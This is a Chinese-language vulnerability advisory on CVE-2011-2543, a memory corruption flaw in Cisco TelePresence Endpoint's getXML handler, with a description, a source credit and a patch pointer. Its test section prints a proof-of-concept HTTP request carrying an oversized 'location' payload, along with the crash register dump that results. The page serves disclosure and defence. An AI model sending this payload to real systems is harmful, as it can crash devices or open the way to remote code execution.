Cisco TelePresence Endpoint内存破坏漏洞(CVE-2011-2543)
发布日期:2011-09-19
更新日期:2011-09-19
受影响系统:Cisco Cisco TelePresence Endpoint MXP F9.1
Cisco Cisco TelePresence Endpoint C TC4.1.2
描述:
BUGTRAQ ID:
49670
CVE ID:
CVE-2011-2543
Cisco TelePresence Endpoint是个人桌面和家庭办公室提供的端点服务。
Cisco TelePresence Endpoint在实现上存在内存破坏漏洞,远程攻击者可利用内存破坏漏洞执行任意代码,可能造成拒绝服务。
getXML句柄对用户提供的输入长度没有正确检查即发送到tshell,在此没有长度和边界检查。因此就会发送超过接受缓冲区大小的输入,造成读取无效地址和Endopint的重启。VCS不会重启,SIGSEGV (或sigabrt)将使进程崩溃。
<*来源:David Klein
链接:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.
1\r\n
Host: 192.168.6.99\r\n\r\n"
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c
00000037 0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858
129e6896 0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18
00000005 00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005
0f410bac 129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005
0f410bac 129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002
建议:
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cisco.com/warp/public/707/advisory.html浏览次数:2794
严重程度:0(网友投票)
